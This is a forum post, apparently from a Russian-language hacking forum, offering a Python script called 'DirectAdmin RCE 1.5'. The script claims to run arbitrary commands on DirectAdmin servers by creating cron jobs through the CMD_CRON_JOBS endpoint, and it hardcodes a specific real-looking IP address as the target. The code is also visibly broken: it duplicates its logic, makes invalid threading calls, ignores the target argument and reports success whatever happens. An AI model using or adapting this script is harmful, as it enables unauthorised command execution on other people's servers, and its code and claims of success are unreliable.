DirectAdmin RCE 1.5
У вас должно быть более 10 реакций для просмотра скрытого контента.
Код:
import requests
import sys
import threading
if len(sys.argv) < 3:
print("Usage: python %s <target_url> <command>" % sys.argv[0])
sys.exit(1)
target_url = "https://208.85.2.148:2222"
command = sys.argv[2]
# Send a GET request to the DirectAdmin target server
response = requests.get(f"{target_url}/CMD_CRON_JOBS")
print(response.text)
# Construct a POST request payload with the command to be executed
params = {
"action": "create",
"minute": "*",
"hour": "*",
"dayofmonth": "*",
"month": "*",
"dayofweek": "*",
"command": "command;",
"command_type": "exec",
"command_exec": command
}
# Send a POST request to the DirectAdmin target server
response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params)
print(response.text)
# Function for DirectAdmin command execution RCE exploit
def exploit(target_url, command):
try:
# Send a GET request to the DirectAdmin target server
response = requests.get(f"{target_url}/CMD_CRON_JOBS")
print(response.text)
# Construct a POST request payload with the command to be executed
params = {
"action": "create",
"minute": "*",
"hour": "*",
"dayofmonth": "*",
"month": "*",
"dayofweek": "*",
"command": "command;",
"command_type": "exec",
"command_exec": command
}
# Send a POST request to the DirectAdmin target server
response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params)
print(response.text)
except Exception as e:
print("An error occurred: %s" % e)
sys.exit(1)
def threading_function(target_url, command):
exploit(target_url, command)
threading.main_thread(10).start()
threading.join()
print("Exploit completed successfully!")